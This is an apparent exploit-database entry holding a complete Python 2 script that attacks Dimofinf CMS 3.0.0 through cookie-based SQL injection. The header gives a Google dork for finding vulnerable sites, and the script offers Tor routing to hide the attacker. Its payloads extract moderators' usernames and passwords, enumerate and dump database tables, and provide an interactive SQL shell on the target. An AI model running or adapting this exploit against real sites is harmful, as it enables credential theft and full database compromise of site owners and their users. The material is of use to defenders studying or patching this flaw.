Dimofinf 3.0.0 SQL Injection



EKU-ID: 5265 CVE: OSVDB-ID:
Author: D35m0nd142 Published: 2015-11-26 Verified: Verified

# Dimofinf CMS Automatic Cookie SQL Injection exploit
# Google Dork: intext:"Powered by Dimofinf"
# Date: 19/11/2015
# Author: D35m0nd142
# Software link: http://www.dimofinf.net
# Version: 3.0.0
# Tested on: Dimofinf version 3.0.0
# Sometimes the vulnerability lets you retrieve the moderators' usernames and passwords but not the list of tables and columns,
# or vice versa; so if one of them does not work, try the other one anyway.

#!/usr/bin/python
import socks
import socket
import requests
import sys,os,time
from random import randint

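check = "Duplicate entry '"  # MySQL error prefix that extract() looks for in a response
tor_addr = "127.0.0.1"  # SOCKS5 endpoint used when the user opts into Tor below
tor_port = 9150
# Fixed pool of User-Agent strings; exactly one is chosen per run.
agents = [
	"Mozilla/5.0 (X11; Linux x86_64; rv:38.0) Gecko/20100101 Firefox/38.0",
	"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.132 Safari/537.36",
	"IBM WebExplorer /v0.94",
	"Mozilla/5.0 (Windows; U; Windows NT 6.1; x64; fr; rv:1.9.2.13) Gecko/20101203 Firebird/3.6.13",
	"Opera/9.80 (X11; Linux i686; Ubuntu/14.10) Presto/2.12.388 Version/12.16",
	"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.75.14 (KHTML, like Gecko) Version/7.0.3 Safari/7046A194A",
]
# Draw the index over the real list length: randint(0, 9) % 6 would weight
# entries 0-3 twice as heavily as entries 4-5.
rand = randint(0, len(agents) - 1)
url = ""  # filled in from user input further down the script
headers = {'User-Agent': agents[rand % len(agents)]}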

def removeDot(s):
	"""Return *s* without its first character.

	Callers use it to drop the leading separator that precedes every
	value handed back by extract(); an empty string is returned unchanged.
	"""
	return s[1:] if len(s) > 1 else s[:0]

def extract(out):
	"""Return the text that follows the ``check`` marker in *out*, up to the first '~'.

	*out* is a response body.  The marker is searched for with a sliding
	window; when it is found the result starts right after it, otherwise the
	scan falls back to offset 0 and the page text up to the first '~' (or the
	whole page when there is no '~') is returned.  NOTE(review): the window
	runs to ``len(out) - len(check)`` exclusive, so a marker ending exactly at
	the end of *out* is never matched.
	"""
	width = len(check)
	begin = 0
	for pos in range(len(out) - width):
		if out[pos:pos + width] == check:
			begin = pos + width
			break
	remainder = out[begin:]
	return remainder.partition('~')[0]

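def req(cookies):
	"""GET the module-level ``url`` with *cookies* and return the response body.

	``url`` and ``headers`` are read from module scope; nothing is assigned,
	so no ``global`` statement is needed.  The *cookies* argument is the dict
	that is actually sent - reading the module-level ``cookie`` instead only
	worked because every caller assigns that global immediately before calling.
	"""
	response = requests.get(url, cookies=cookies, headers=headers)
	return response.text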

print "\n-----------------------------------------------------------"
print "Dimofinf CMS v3.0.0 Automatic Cookie SQL Injection exploit"
print "Author: D35m0nd142"
print "-----------------------------------------------------------"

# Target URL.  The scheme check is a substring test, so "http" anywhere in
# the input passes and a prefix is only added when it is absent entirely.
url = raw_input("\nEnter URL -> ") 
if("http" not in url):
	url = "http://%s" %url
tor = raw_input("Do you want to use TOR? (y/n) ")

# Optional Tor routing: socket.socket is replaced, so every socket created
# from here on goes through the SOCKS5 proxy at tor_addr:tor_port.
# NOTE(review): the try body only configures the proxy and opens no
# connection, so requests.ConnectionError is not expected here and the
# handler probably never fires; a failure would propagate uncaught.
if(tor == "y" or tor == "Y" or tor == "yes"):
	try:
		socks.setdefaultproxy(socks.PROXY_TYPE_SOCKS5, tor_addr, tor_port)
		socket.socket = socks.socksocket
	except requests.ConnectionError as e:
		print "[ERROR] Could not connect to TOR"
		sys.exit(1)

# First request, made only to collect the site's cookies.  It is sent
# without the custom headers dict, and the jar is inspected via its str().
session = requests.Session()
response = session.get(url)
s = str(session.cookies.get_dict())

# Everything below rides on the 'dimguest' cookie, so nothing is attempted
# unless the first response set it.  i counts rows retrieved in modes 1/2.
if("dimguest" in s):
	i = 0
	print "\n[+] 'dimguest' cookie found. Checking exploitability.."
	# Probe: a lone single quote in the cookie value.  The target is treated
	# as injectable only when all three error strings appear in the response.
	cookie = {'dimguest':'1\''}
	r = requests.get(url,cookies=cookie,headers=headers)

	choice = "nope"
	if("Database Error" in r.text and "Invalid SQL" in r.text and "You have an error in your SQL" in r.text):
		print "[+] Target seems to be exploitable (SQL error found)."
		# Error-based read: the value comes back inside the MySQL
		# "Duplicate entry" message (see check/extract), prefixed by the
		# separator that removeDot() strips and terminated by '~'.
		cookie = {'dimguest':'1\' and (select 1 from (select count(*),concat(0x3a,(select user()),0x7e,floor(rand(0)*2))a from information_schema.tables group by a)x)#'}
		out = req(cookie)
		current = extract(out)

		# Results of 70+ characters are treated as unreadable - presumably
		# because the error text truncates long keys; TODO confirm.
		if(len(current) < 70):
			print "[+] Current User: %s" %(removeDot(current))
		else:
			print "[+] Current User: ?"

		print "\n----------------------------------------"
		print " 1) Get moderators' usernames:passwords"
		print " 2) Browse DB (wizard)"
		print " 3) SQL shell (difficult)"
		print "----------------------------------------"
		choice = raw_input(" -> ")
		print ""

		if(choice == "1"):
			# One row per request: the LIMIT offset i advances until the
			# response no longer carries the duplicate-entry marker.
			cookie = {'dimguest':'1\' and (select 1 from (select count(*),concat(0x3a,(select Concat(username,0x3a,password) from moderators limit %s,1),0x7e,floor(rand(0)*2))a from information_schema.tables group by a)x)#' %i}
			out = req(cookie)

			while(check in out):
				got = extract(out)

				if(len(got) > 0):
					print "[+] GOT: '%s'" %(removeDot(got))
				i += 1
				cookie = {'dimguest':'1\' and (select 1 from (select count(*),concat(0x3a,(select Concat(username,0x3a,password) from moderators limit %s,1),0x7e,floor(rand(0)*2))a from information_schema.tables group by a)x)#' %i}
				out = req(cookie)

		elif(choice == "2"):
			print "[*] Gathering tables..\n"
			
			# Same one-row-per-request loop, over the current schema's table names.
			cookie = {'dimguest':'1\' and (select 1 from (select count(*),concat(0x3a,(select Concat(table_name) from information_schema.tables where table_schema=database() limit %s,1),0x7e,floor(rand(0)*2))a from information_schema.tables group by a)x)#' %i}
			out = req(cookie)

			while(check in out):
				got = extract(out)
				if(len(got) > 0):
					print "[Table] '%s'" %(removeDot(got))
				i += 1
				cookie = {'dimguest':'1\' and (select 1 from (select count(*),concat(0x3a,(select Concat(table_name) from information_schema.tables where table_schema=database() limit %s,1),0x7e,floor(rand(0)*2))a from information_schema.tables group by a)x)#' %i}
				out = req(cookie)

			# Message text means "no table found".
			if(i == 0):
				print "[-] Any table found :("
			
			# Hand-rolled split on ','.  NOTE(review): an input ending in ','
			# appends that comma to the last name instead of ending it, and an
			# empty input yields no tables at all.
			tables = raw_input("\nEnter the tables (separated by ',') of which you want the columns -> ")
			mytables = []

			tmp = ""
			for x in range(0,len(tables)):
				if(tables[x] == ',' or x == len(tables)-1):
					if(x == len(tables)-1):
						tmp += tables[x]
					mytables.append(tmp)
					tmp = ""
				else:
					tmp += tables[x]

			# Column names per table, again one row per request; k is the
			# per-table LIMIT offset.
			for table in mytables:
				col_check = []
				k = 0
				print "\n[+] Columns in '%s':\n" %table
				cookie = {'dimguest':'1\' and (select 1 from (select count(*),concat(0x3a,(select Concat(column_name) from information_schema.columns where table_name=\'%s\' limit %s,1),0x7e,floor(rand(0)*2))a from information_schema.tables group by a)x)#' %(table,k)}
				out = req(cookie)

				while(check in out):
					got = extract(out)
					# Stop as soon as a name repeats; guards against looping
					# forever on responses that keep returning the same row.
					if(got in col_check):
						break
					if(len(got) > 0):
						col_check.append(got)
						print "  [Column] '%s'" %(removeDot(got))
					k += 1
					cookie = {'dimguest':'1\' and (select 1 from (select count(*),concat(0x3a,(select Concat(column_name) from information_schema.columns where table_name=\'%s\' limit %s,1),0x7e,floor(rand(0)*2))a from information_schema.tables group by a)x)#' %(table,k)}
					out = req(cookie)

			# NOTE(review): k reflects only the last table processed, and it is
			# never assigned when mytables is empty, so this line raises
			# NameError in that case.  Message text means "no column found".
			if(k == 0):
				print "[-] Any column found :("
			
			dump = "nope"
			while(dump != "exit" and dump != "quit"):
				dump = raw_input("\nEnter the table and columns you want to dump (ex: table_name:column1,column2) -> ")

				if(dump == "exit" or dump == "quit"):
					break
				# Parse "table:col1,col2" by hand.  NOTE(review): `x += 1`
				# below only shifts x for the rest of that iteration (the for
				# loop resets it), so the character after ':' is consumed
				# twice and ends up duplicated at the front of the first
				# column; the strip after the loop removes that duplicate.
				# A ':' as the final character makes dump[x] raise IndexError.
				gotTable = False
				table = ""
				cols = []
				col = ""
				for x in range(0,len(dump)):
					if(gotTable is False and dump[x] == ':'):
						gotTable = True
						x += 1
					if(gotTable is False):
						table += dump[x]
					else:
						if(dump[x] == ',' or x == len(dump)-1):
							if(x == len(dump)-1):
								col += dump[x]
							cols.append(col)
							col = ""
						else:
							col += dump[x]

				if(len(cols) > 0):
					cols[0] = (cols[0])[1:]
				print cols  # debug output of the parsed column list

				print "\n[*] Dumping..\n"

				# Column list for the Concat(): each name is followed by
				# ",0x3a," and the trailing ',' is dropped, so the separator
				# is the last element.
				query = "1' and (select 1 from (select count(*),concat(0x3a,(select Concat("
				for colu in cols:
					query += "%s,0x3a," %colu
				query = query[:-1]

				z = 0
				query += ") from %s limit " %table

				# Row z per request until the marker disappears from the response.
				while(True):
					snip = "%s,1),0x7e,floor(rand(0)*2))a from information_schema.tables group by a)x)#" %z
					z += 1
					myquery = query+snip
					cookie = {'dimguest':myquery}	
					out = req(cookie)
					if(check not in out):
						break
					got = extract(out)
					print "[Dump]: '%s'" %(removeDot(got))
				print ""

		elif(choice == "3"):
			print "[*] Opening SQL shell..\n"
			time.sleep(0.6)
			cmd = ""
			while(cmd != "exit" and cmd != "quit"):
				cmd = raw_input("SQL-shell> ")
				if(cmd == "exit" or cmd == "quit"):
					break
				# Input is embedded verbatim.  extract() is applied even when
				# the response lacks the marker, in which case it returns the
				# page text up to the first '~'.
				cookie = {'dimguest':'1\' and (%s)#' %cmd}
				out = req(cookie)
				got = extract(out)
				print "qui"  # stray debug print
				print "[+] GOT: '%s'\n" %(removeDot(got))
		else:
			print "[INPUT ERROR] You entered a not valid choice!"
			sys.exit(1)

	# i stays 0 when the probe found no SQL error or no row came back; mode 3
	# never touches i, hence the exclusion.
	if(i==0 and choice != "3"):
		print "[-] '%s' not vulnerable, or patched." %url

else:
	print "\n[+] Target not vulnerable. (cookie 'dimguest' not found.)"